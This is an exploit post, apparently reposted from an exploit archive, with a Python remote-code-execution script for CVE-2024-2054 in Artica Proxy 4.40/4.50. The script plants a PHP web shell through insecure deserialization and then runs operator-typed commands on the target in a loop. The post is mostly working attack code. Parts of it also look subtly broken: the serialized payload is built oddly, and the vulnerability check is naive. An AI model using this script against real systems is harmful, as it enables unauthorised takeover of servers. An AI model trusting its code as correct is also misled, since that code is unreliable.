Artica Proxy 4.50 - Remote Code Execution (RCE)

[taibeihacker]

# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
application insecure deserialization (RCE)
# Google Dork:
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054

you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054


import requests
import base64
import urllib3
from colorama import Fore

print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")

URL = input("Enter url: ")
if URL[-1]=="/":
    ACTUAL_URL = URL[:-1]
else:
    ACTUAL_URL = URL

ARTICA_URL = ACTUAL_URL

def check(ARTICA_URL):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
    except Exception as e:
        print(Fore.RED+"Could not reach, check URL")
    if check.status_code==200:
        print(Fore.GREEN+"Vulnerable")
        return True
    else:
        print(Fore.RED+"Not Vulnerable")


def exploit(ARTICA_URL):

    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
    payload_data = {
        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
            "cache_serializer": "json",
            "cache_size": 999999999,
            "cache_data": {
                payload: {
                    "cache_date": 0,
                    "ttl": 999999999
                }
            }
        }
    }


    while True:
        PAYLOAD_CMD = input("enter command: ")
        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        response = requests.get(url, verify=False)
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        if response.status_code == 200:
            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
            cmd_response = requests.get(cmd_url, verify=False)
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            print(cmd_response.text)
        else:
            print("Failed to execute the payload")

check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
    exploit(ARTICA_URL=ARTICA_URL)